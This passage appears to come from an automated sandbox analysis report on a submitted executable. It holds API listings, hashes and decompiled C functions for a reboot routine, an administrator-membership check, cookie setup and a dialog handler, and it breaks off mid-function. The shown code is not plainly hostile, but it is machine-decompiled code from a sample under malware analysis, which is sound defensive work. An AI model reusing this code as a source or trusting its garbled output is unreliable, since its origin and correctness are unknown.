                                                                                                                                                                                                      0x00e75d9f
                                                                                                                                                                                                      0x00e75da5
                                                                                                                                                                                                      0x00e75dab
                                                                                                                                                                                                      0x00e75dba
                                                                                                                                                                                                      0x00e76218
                                                                                                                                                                                                      0x00e7621d
                                                                                                                                                                                                      0x00e76220
                                                                                                                                                                                                      0x00e76221
                                                                                                                                                                                                      0x00e76229
                                                                                                                                                                                                      0x00e76230
                                                                                                                                                                                                      0x00e76247
                                                                                                                                                                                                      0x00e7626a
                                                                                                                                                                                                      0x00e76272
                                                                                                                                                                                                      0x00e76249
                                                                                                                                                                                                      0x00e76255
                                                                                                                                                                                                      0x00e7625f
                                                                                                                                                                                                      0x00e76264
                                                                                                                                                                                                      0x00e76264
                                                                                                                                                                                                      0x00e76284
                                                                                                                                                                                                      0x00e75dc0
                                                                                                                                                                                                      0x00e75dc0
                                                                                                                                                                                                      0x00e75dca
                                                                                                                                                                                                      0x00e75e22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75dcc
                                                                                                                                                                                                      0x00e75dce
                                                                                                                                                                                                      0x00e75e24
                                                                                                                                                                                                      0x00e75e24
                                                                                                                                                                                                      0x00e75e2c
                                                                                                                                                                                                      0x00e75e47
                                                                                                                                                                                                      0x00e75e4a
                                                                                                                                                                                                      0x00e761d2
                                                                                                                                                                                                      0x00e761e2
                                                                                                                                                                                                      0x00e761e7
                                                                                                                                                                                                      0x00e761ee
                                                                                                                                                                                                      0x00e761f1
                                                                                                                                                                                                      0x00e761f1
                                                                                                                                                                                                      0x00e761f8
                                                                                                                                                                                                      0x00e761f8
                                                                                                                                                                                                      0x00e75e50
                                                                                                                                                                                                      0x00e75e53
                                                                                                                                                                                                      0x00e76109
                                                                                                                                                                                                      0x00e7611f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76125
                                                                                                                                                                                                      0x00e76137
                                                                                                                                                                                                      0x00e7613a
                                                                                                                                                                                                      0x00e7613c
                                                                                                                                                                                                      0x00e7613e
                                                                                                                                                                                                      0x00e7613e
                                                                                                                                                                                                      0x00e76141
                                                                                                                                                                                                      0x00e76141
                                                                                                                                                                                                      0x00e76143
                                                                                                                                                                                                      0x00e76144
                                                                                                                                                                                                      0x00e7614a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76150
                                                                                                                                                                                                      0x00e76152
                                                                                                                                                                                                      0x00e7615c
                                                                                                                                                                                                      0x00e76170
                                                                                                                                                                                                      0x00e76172
                                                                                                                                                                                                      0x00e7617c
                                                                                                                                                                                                      0x00e76190
                                                                                                                                                                                                      0x00e76190
                                                                                                                                                                                                      0x00e76196
                                                                                                                                                                                                      0x00e761a5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e761ab
                                                                                                                                                                                                      0x00e761b9
                                                                                                                                                                                                      0x00e761c6
                                                                                                                                                                                                      0x00e761c6
                                                                                                                                                                                                      0x00e7617e
                                                                                                                                                                                                      0x00e76180
                                                                                                                                                                                                      0x00e7618a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7618a
                                                                                                                                                                                                      0x00e7615e
                                                                                                                                                                                                      0x00e76160
                                                                                                                                                                                                      0x00e7616a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7616a
                                                                                                                                                                                                      0x00e7615c
                                                                                                                                                                                                      0x00e7614a
                                                                                                                                                                                                      0x00e7610b
                                                                                                                                                                                                      0x00e7610e
                                                                                                                                                                                                      0x00e7610e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e59
                                                                                                                                                                                                      0x00e75e59
                                                                                                                                                                                                      0x00e75e5c
                                                                                                                                                                                                      0x00e7604f
                                                                                                                                                                                                      0x00e76056
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7605c
                                                                                                                                                                                                      0x00e7606e
                                                                                                                                                                                                      0x00e76071
                                                                                                                                                                                                      0x00e75e7d
                                                                                                                                                                                                      0x00e75e77
                                                                                                                                                                                                      0x00e75e6e
                                                                                                                                                                                                      0x00e75e65
                                                                                                                                                                                                      0x00e75e5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00e75dce
                                                                                                                                                                                                      0x00e75dca
                                                                                                                                                                                                      0x00e75dba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d00
                                                                                                                                                                                                      0x00e75dd9
                                                                                                                                                                                                      0x00e75e04
                                                                                                                                                                                                      0x00e761fe
                                                                                                                                                                                                      0x00e75e0a
                                                                                                                                                                                                      0x00e75e0c
                                                                                                                                                                                                      0x00e75e17
                                                                                                                                                                                                      0x00e75e17
                                                                                                                                                                                                      0x00e75e04
                                                                                                                                                                                                      0x00e76200
                                                                                                                                                                                                      0x00e76200
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 00E75CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00E78B3E,00000104,00000000,?,?), ref: 00E75DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00E75E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 00E75EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00E75F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00E75FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 00E76008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00E760AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00E71140,00000000,00000040,00000000), ref: 00E761F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00E761F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 42e3252d6d24b26d870a9d2f4060668bd374d09ddff58864155ba97adebfb6c5
                                                                                                                                                                                                      • Instruction ID: a3ab6594d243a367cb0a9805326a9e50153defb195457023e25908d6428c2c76
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42e3252d6d24b26d870a9d2f4060668bd374d09ddff58864155ba97adebfb6c5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79D10872A44E455EDB35CB398C487FA7BA19B5630CF54F0AAC48EB6191D7F04EC68B01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E00E71F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						if( *0xe79a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E00E744B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E00E76CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E00E744B9(0, 0x522, 0xe71140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E00E71EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00E71EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E71F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00E71FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 645af60ed1dbc00c233f724c46432b5861acc906c2c50dac75aa6dc0d820eb94
                                                                                                                                                                                                      • Instruction ID: ac2b2f468cf4af6171e4622bc5c99e27e87c75ed61326ffe97679bdb48ed7fcc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 645af60ed1dbc00c233f724c46432b5861acc906c2c50dac75aa6dc0d820eb94
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D210AB1B403056BEB209BAA9C0AFBF77B8EFC5714F149068FA0DF6080D77488459261
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E00E717EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0xe7a288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E718DD), ref: 00E7181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E7182C
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00E718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E718DD), ref: 00E71855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,00E718DD), ref: 00E71883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00E718DD), ref: 00E7188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: 4f40351f89cc570788776db9df23cb1d02ab8a3e017c2fbcdf744bbc3507240a
                                                                                                                                                                                                      • Instruction ID: 682d101e969fb15c61b2423236b468eaacc2d95312c27abd9f3f6090a5a43c9a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f40351f89cc570788776db9df23cb1d02ab8a3e017c2fbcdf744bbc3507240a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43119331E00309AFEB14DFA5DC49ABEBBB8EF84705F144579F919F2290DA309D448B92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E76CF0(char _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				_t1 =  &_a4; // 0xe76e26
                                                                                                                                                                                                      				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E76E26,00E71000), ref: 00E76CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(&n,?,00E76E26,00E71000), ref: 00E76D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00E76E26,00E71000), ref: 00E76D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00E76E26,00E71000), ref: 00E76D12
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID: &n
                                                                                                                                                                                                      • API String ID: 3231755760-661210962
                                                                                                                                                                                                      • Opcode ID: b20fa5cea70bb85946143922f3c625a3d1ecc54c99b0ff4730289b46c37987ea
                                                                                                                                                                                                      • Instruction ID: b9557ee3c5e57be81afda626b14bb33976007ac73a5da2972f199c7cfd93d9ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b20fa5cea70bb85946143922f3c625a3d1ecc54c99b0ff4730289b46c37987ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9D0C9B2001108BFFB006BE2EC0CA6D3F28EBC8222F8C4020F31DA2420CA324495CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E77155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0xe78004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe78004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0xe78008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E77182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00E77191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E7719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00E771A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E771B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: 6c9a7f78da0d74151a8c4d9c500291caf4401cf03cd277c01481145e77b0c6fd
                                                                                                                                                                                                      • Instruction ID: 436644ecbe0bbb8bdad00d1584553b21d19f234512985918d9b4119326e48b33
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c9a7f78da0d74151a8c4d9c500291caf4401cf03cd277c01481145e77b0c6fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B114C71D02208DFDB10DFB9EA48A9EB7F5EF58315FA54865D809F7210EA309A48CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E00E73210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E00E743D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0xe79a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xe791e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E00E744B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                      						__eflags = _t49 - 0xe791e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0xe791e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0xe791e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
